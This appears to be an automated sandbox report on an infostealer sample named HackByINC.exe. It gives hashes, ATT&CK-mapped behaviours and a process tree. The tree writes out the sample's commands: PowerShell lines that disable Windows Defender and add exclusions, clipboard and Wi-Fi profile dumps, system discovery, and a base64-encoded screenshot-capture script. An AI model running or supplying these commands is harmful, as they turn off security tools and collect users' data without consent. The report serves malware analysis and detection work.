429f9b84b71f65702359b2dac0a962322862e7c0c33e00685100c0699ba4197b

Resubmissions

08/02/2025, 00:46

250208-a4xyfawnew 10

08/02/2025, 00:42

250208-a2jb9swmdw 10

Analysis

max time kernel
25s
max time network
27s
platform
windows11-21h2_x64
resource
win11-20250207-en
resource tags

arch:x64arch:x86image:win11-20250207-enlocale:en-usos:windows11-21h2-x64system
submitted
08/02/2025, 00:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HackByINC.exe
Size

6.8MB
MD5

6ca3af9f2b35018656c3e3c50fed4d5b
SHA1

db76da5f8cfee5c4ad613d238231968608f4576e
SHA256

1f36c3cb1c8b3cf49b38b47ca5f51c81fb0c0e089ec23e915308467f0515bcc1
SHA512

249711de4ca1fdda7582f2236cad821e6e597a37f182a0fc61d3e77c93355403549c54228b3a326f195ae3df2f43e6e1e85bfbbfae18c2390beab673d4538453
SSDEEP

98304:vvkwN+MdA5wqMXh8MMhJMjarJaon7JPzf+JiUCS3swhzqgez7DoDZDJ1n6hBnLnU:vvV1UB6ylnlPzf+JiJCsmFMvcn6hVvQ

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1584	powershell.exe
1372	powershell.exe
32	powershell.exe
3080	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4420	cmd.exe
4084	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2236	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
1240	HackByINC.exe
1240	HackByINC.exe
1240	HackByINC.exe
1240	HackByINC.exe
1240	HackByINC.exe
1240	HackByINC.exe
1240	HackByINC.exe
1240	HackByINC.exe
1240	HackByINC.exe
1240	HackByINC.exe
1240	HackByINC.exe
1240	HackByINC.exe
1240	HackByINC.exe
1240	HackByINC.exe
1240	HackByINC.exe
1240	HackByINC.exe
1240	HackByINC.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
5004	tasklist.exe
1300	tasklist.exe
4940	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/0x001900000002ae73-21.dat	upx
behavioral3/memory/1240-25-0x00007FF8A6370000-0x00007FF8A695A000-memory.dmp	upx
behavioral3/files/0x001900000002ae66-27.dat	upx
behavioral3/memory/1240-29-0x00007FF8BBDD0000-0x00007FF8BBDF3000-memory.dmp	upx
behavioral3/files/0x001900000002ae78-39.dat	upx
behavioral3/memory/1240-48-0x00007FF8C1520000-0x00007FF8C152F000-memory.dmp	upx
behavioral3/files/0x001900000002ae6d-47.dat	upx
behavioral3/files/0x001900000002ae6c-46.dat	upx
behavioral3/files/0x001900000002ae6b-45.dat	upx
behavioral3/files/0x001900000002ae6a-44.dat	upx
behavioral3/files/0x001900000002ae69-43.dat	upx
behavioral3/files/0x001900000002ae68-42.dat	upx
behavioral3/files/0x001900000002ae67-41.dat	upx
behavioral3/files/0x001900000002ae65-40.dat	upx
behavioral3/files/0x001900000002ae77-38.dat	upx
behavioral3/files/0x001900000002ae76-37.dat	upx
behavioral3/files/0x001900000002ae72-34.dat	upx
behavioral3/files/0x001900000002ae70-33.dat	upx
behavioral3/files/0x001900000002ae71-31.dat	upx
behavioral3/memory/1240-54-0x00007FF8BBC10000-0x00007FF8BBC3D000-memory.dmp	upx
behavioral3/memory/1240-56-0x00007FF8BD570000-0x00007FF8BD589000-memory.dmp	upx
behavioral3/memory/1240-58-0x00007FF8BAF30000-0x00007FF8BAF53000-memory.dmp	upx
behavioral3/memory/1240-60-0x00007FF8B7530000-0x00007FF8B769F000-memory.dmp	upx
behavioral3/memory/1240-64-0x00007FF8C1510000-0x00007FF8C151D000-memory.dmp	upx
behavioral3/memory/1240-62-0x00007FF8BD4B0000-0x00007FF8BD4C9000-memory.dmp	upx
behavioral3/memory/1240-66-0x00007FF8BACB0000-0x00007FF8BACDE000-memory.dmp	upx
behavioral3/memory/1240-70-0x00007FF8A6370000-0x00007FF8A695A000-memory.dmp	upx
behavioral3/memory/1240-74-0x00007FF8BBDD0000-0x00007FF8BBDF3000-memory.dmp	upx
behavioral3/memory/1240-73-0x00007FF8A5FF0000-0x00007FF8A6365000-memory.dmp	upx
behavioral3/memory/1240-71-0x00007FF8B7C90000-0x00007FF8B7D48000-memory.dmp	upx
behavioral3/memory/1240-81-0x00007FF8B7410000-0x00007FF8B752C000-memory.dmp	upx
behavioral3/memory/1240-79-0x00007FF8C09F0000-0x00007FF8C09FD000-memory.dmp	upx
behavioral3/memory/1240-78-0x00007FF8BBC10000-0x00007FF8BBC3D000-memory.dmp	upx
behavioral3/memory/1240-76-0x00007FF8B8320000-0x00007FF8B8334000-memory.dmp	upx
behavioral3/memory/1240-137-0x00007FF8BAF30000-0x00007FF8BAF53000-memory.dmp	upx
behavioral3/memory/1240-182-0x00007FF8B7530000-0x00007FF8B769F000-memory.dmp	upx
behavioral3/memory/1240-236-0x00007FF8BD4B0000-0x00007FF8BD4C9000-memory.dmp	upx
behavioral3/memory/1240-239-0x00007FF8C1510000-0x00007FF8C151D000-memory.dmp	upx
behavioral3/memory/1240-256-0x00007FF8BACB0000-0x00007FF8BACDE000-memory.dmp	upx
behavioral3/memory/1240-267-0x00007FF8B7C90000-0x00007FF8B7D48000-memory.dmp	upx
behavioral3/memory/1240-279-0x00007FF8A5FF0000-0x00007FF8A6365000-memory.dmp	upx
behavioral3/memory/1240-281-0x00007FF8BBDD0000-0x00007FF8BBDF3000-memory.dmp	upx
behavioral3/memory/1240-294-0x00007FF8B7410000-0x00007FF8B752C000-memory.dmp	upx
behavioral3/memory/1240-286-0x00007FF8B7530000-0x00007FF8B769F000-memory.dmp	upx
behavioral3/memory/1240-280-0x00007FF8A6370000-0x00007FF8A695A000-memory.dmp	upx
behavioral3/memory/1240-324-0x00007FF8B7410000-0x00007FF8B752C000-memory.dmp	upx
behavioral3/memory/1240-330-0x00007FF8BAF30000-0x00007FF8BAF53000-memory.dmp	upx
behavioral3/memory/1240-335-0x00007FF8B7C90000-0x00007FF8B7D48000-memory.dmp	upx
behavioral3/memory/1240-334-0x00007FF8BACB0000-0x00007FF8BACDE000-memory.dmp	upx
behavioral3/memory/1240-333-0x00007FF8C1510000-0x00007FF8C151D000-memory.dmp	upx
behavioral3/memory/1240-332-0x00007FF8BD4B0000-0x00007FF8BD4C9000-memory.dmp	upx
behavioral3/memory/1240-331-0x00007FF8B7530000-0x00007FF8B769F000-memory.dmp	upx
behavioral3/memory/1240-329-0x00007FF8BD570000-0x00007FF8BD589000-memory.dmp	upx
behavioral3/memory/1240-328-0x00007FF8BBC10000-0x00007FF8BBC3D000-memory.dmp	upx
behavioral3/memory/1240-327-0x00007FF8C1520000-0x00007FF8C152F000-memory.dmp	upx
behavioral3/memory/1240-326-0x00007FF8BBDD0000-0x00007FF8BBDF3000-memory.dmp	upx
behavioral3/memory/1240-325-0x00007FF8A5FF0000-0x00007FF8A6365000-memory.dmp	upx
behavioral3/memory/1240-310-0x00007FF8A6370000-0x00007FF8A695A000-memory.dmp	upx
behavioral3/memory/1240-323-0x00007FF8C09F0000-0x00007FF8C09FD000-memory.dmp	upx
behavioral3/memory/1240-322-0x00007FF8B8320000-0x00007FF8B8334000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1468	cmd.exe
2788	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4784	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1596	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
1372	powershell.exe
1584	powershell.exe
1372	powershell.exe
1584	powershell.exe
5116	powershell.exe
5116	powershell.exe
5116	powershell.exe
4084	powershell.exe
4084	powershell.exe
4084	powershell.exe
32	powershell.exe
32	powershell.exe
3952	powershell.exe
3952	powershell.exe
3080	powershell.exe
3080	powershell.exe
4688	powershell.exe
4688	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeDebugPrivilege	5004	tasklist.exe
Token: SeDebugPrivilege	1300	tasklist.exe
Token: SeDebugPrivilege	4940	tasklist.exe
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeIncreaseQuotaPrivilege	3912	WMIC.exe
Token: SeSecurityPrivilege	3912	WMIC.exe
Token: SeTakeOwnershipPrivilege	3912	WMIC.exe
Token: SeLoadDriverPrivilege	3912	WMIC.exe
Token: SeSystemProfilePrivilege	3912	WMIC.exe
Token: SeSystemtimePrivilege	3912	WMIC.exe
Token: SeProfSingleProcessPrivilege	3912	WMIC.exe
Token: SeIncBasePriorityPrivilege	3912	WMIC.exe
Token: SeCreatePagefilePrivilege	3912	WMIC.exe
Token: SeBackupPrivilege	3912	WMIC.exe
Token: SeRestorePrivilege	3912	WMIC.exe
Token: SeShutdownPrivilege	3912	WMIC.exe
Token: SeDebugPrivilege	3912	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3912	WMIC.exe
Token: SeRemoteShutdownPrivilege	3912	WMIC.exe
Token: SeUndockPrivilege	3912	WMIC.exe
Token: SeManageVolumePrivilege	3912	WMIC.exe
Token: 33	3912	WMIC.exe
Token: 34	3912	WMIC.exe
Token: 35	3912	WMIC.exe
Token: 36	3912	WMIC.exe
Token: SeDebugPrivilege	4084	powershell.exe
Token: SeIncreaseQuotaPrivilege	3912	WMIC.exe
Token: SeSecurityPrivilege	3912	WMIC.exe
Token: SeTakeOwnershipPrivilege	3912	WMIC.exe
Token: SeLoadDriverPrivilege	3912	WMIC.exe
Token: SeSystemProfilePrivilege	3912	WMIC.exe
Token: SeSystemtimePrivilege	3912	WMIC.exe
Token: SeProfSingleProcessPrivilege	3912	WMIC.exe
Token: SeIncBasePriorityPrivilege	3912	WMIC.exe
Token: SeCreatePagefilePrivilege	3912	WMIC.exe
Token: SeBackupPrivilege	3912	WMIC.exe
Token: SeRestorePrivilege	3912	WMIC.exe
Token: SeShutdownPrivilege	3912	WMIC.exe
Token: SeDebugPrivilege	3912	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3912	WMIC.exe
Token: SeRemoteShutdownPrivilege	3912	WMIC.exe
Token: SeUndockPrivilege	3912	WMIC.exe
Token: SeManageVolumePrivilege	3912	WMIC.exe
Token: 33	3912	WMIC.exe
Token: 34	3912	WMIC.exe
Token: 35	3912	WMIC.exe
Token: 36	3912	WMIC.exe
Token: SeDebugPrivilege	32	powershell.exe
Token: SeDebugPrivilege	3952	powershell.exe
Token: SeIncreaseQuotaPrivilege	3832	WMIC.exe
Token: SeSecurityPrivilege	3832	WMIC.exe
Token: SeTakeOwnershipPrivilege	3832	WMIC.exe
Token: SeLoadDriverPrivilege	3832	WMIC.exe
Token: SeSystemProfilePrivilege	3832	WMIC.exe
Token: SeSystemtimePrivilege	3832	WMIC.exe
Token: SeProfSingleProcessPrivilege	3832	WMIC.exe
Token: SeIncBasePriorityPrivilege	3832	WMIC.exe
Token: SeCreatePagefilePrivilege	3832	WMIC.exe
Token: SeBackupPrivilege	3832	WMIC.exe
Token: SeRestorePrivilege	3832	WMIC.exe
Token: SeShutdownPrivilege	3832	WMIC.exe
Token: SeDebugPrivilege	3832	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3088 wrote to memory of 1240	3088	HackByINC.exe	80
PID 3088 wrote to memory of 1240	3088	HackByINC.exe	80
PID 1240 wrote to memory of 3868	1240	HackByINC.exe	81
PID 1240 wrote to memory of 3868	1240	HackByINC.exe	81
PID 1240 wrote to memory of 3048	1240	HackByINC.exe	82
PID 1240 wrote to memory of 3048	1240	HackByINC.exe	82
PID 3868 wrote to memory of 1584	3868	cmd.exe	85
PID 3868 wrote to memory of 1584	3868	cmd.exe	85
PID 3048 wrote to memory of 1372	3048	cmd.exe	86
PID 3048 wrote to memory of 1372	3048	cmd.exe	86
PID 1240 wrote to memory of 1620	1240	HackByINC.exe	87
PID 1240 wrote to memory of 1620	1240	HackByINC.exe	87
PID 1240 wrote to memory of 236	1240	HackByINC.exe	88
PID 1240 wrote to memory of 236	1240	HackByINC.exe	88
PID 1240 wrote to memory of 4964	1240	HackByINC.exe	91
PID 1240 wrote to memory of 4964	1240	HackByINC.exe	91
PID 1240 wrote to memory of 4420	1240	HackByINC.exe	92
PID 1240 wrote to memory of 4420	1240	HackByINC.exe	92
PID 1240 wrote to memory of 652	1240	HackByINC.exe	93
PID 1240 wrote to memory of 652	1240	HackByINC.exe	93
PID 1240 wrote to memory of 2768	1240	HackByINC.exe	95
PID 1240 wrote to memory of 2768	1240	HackByINC.exe	95
PID 1240 wrote to memory of 2492	1240	HackByINC.exe	96
PID 1240 wrote to memory of 2492	1240	HackByINC.exe	96
PID 1240 wrote to memory of 3184	1240	HackByINC.exe	97
PID 1240 wrote to memory of 3184	1240	HackByINC.exe	97
PID 1240 wrote to memory of 1468	1240	HackByINC.exe	94
PID 1240 wrote to memory of 1468	1240	HackByINC.exe	94
PID 236 wrote to memory of 5004	236	cmd.exe	105
PID 236 wrote to memory of 5004	236	cmd.exe	105
PID 1620 wrote to memory of 1300	1620	cmd.exe	106
PID 1620 wrote to memory of 1300	1620	cmd.exe	106
PID 652 wrote to memory of 4940	652	cmd.exe	107
PID 652 wrote to memory of 4940	652	cmd.exe	107
PID 3184 wrote to memory of 5116	3184	cmd.exe	108
PID 3184 wrote to memory of 5116	3184	cmd.exe	108
PID 4964 wrote to memory of 3912	4964	cmd.exe	111
PID 4964 wrote to memory of 3912	4964	cmd.exe	111
PID 1468 wrote to memory of 2788	1468	cmd.exe	110
PID 1468 wrote to memory of 2788	1468	cmd.exe	110
PID 2492 wrote to memory of 1596	2492	cmd.exe	112
PID 2492 wrote to memory of 1596	2492	cmd.exe	112
PID 4420 wrote to memory of 4084	4420	cmd.exe	113
PID 4420 wrote to memory of 4084	4420	cmd.exe	113
PID 2768 wrote to memory of 1688	2768	cmd.exe	114
PID 2768 wrote to memory of 1688	2768	cmd.exe	114
PID 1240 wrote to memory of 1040	1240	HackByINC.exe	115
PID 1240 wrote to memory of 1040	1240	HackByINC.exe	115
PID 1040 wrote to memory of 4060	1040	cmd.exe	117
PID 1040 wrote to memory of 4060	1040	cmd.exe	117
PID 1240 wrote to memory of 3416	1240	HackByINC.exe	118
PID 1240 wrote to memory of 3416	1240	HackByINC.exe	118
PID 5116 wrote to memory of 3420	5116	powershell.exe	140
PID 5116 wrote to memory of 3420	5116	powershell.exe	140
PID 3416 wrote to memory of 5096	3416	cmd.exe	121
PID 3416 wrote to memory of 5096	3416	cmd.exe	121
PID 1240 wrote to memory of 664	1240	HackByINC.exe	122
PID 1240 wrote to memory of 664	1240	HackByINC.exe	122
PID 3420 wrote to memory of 948	3420	csc.exe	124
PID 3420 wrote to memory of 948	3420	csc.exe	124
PID 664 wrote to memory of 972	664	cmd.exe	125
PID 664 wrote to memory of 972	664	cmd.exe	125
PID 1240 wrote to memory of 4660	1240	HackByINC.exe	126
PID 1240 wrote to memory of 4660	1240	HackByINC.exe	126

C:\Users\Admin\AppData\Local\Temp\HackByINC.exe
"C:\Users\Admin\AppData\Local\Temp\HackByINC.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3088
- C:\Users\Admin\AppData\Local\Temp\HackByINC.exe
  "C:\Users\Admin\AppData\Local\Temp\HackByINC.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\HackByINC.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\HackByINC.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1584
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3048
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1620
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:236
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4964
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:4420
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4084
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:652
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:1468
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2768
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2492
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3184
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
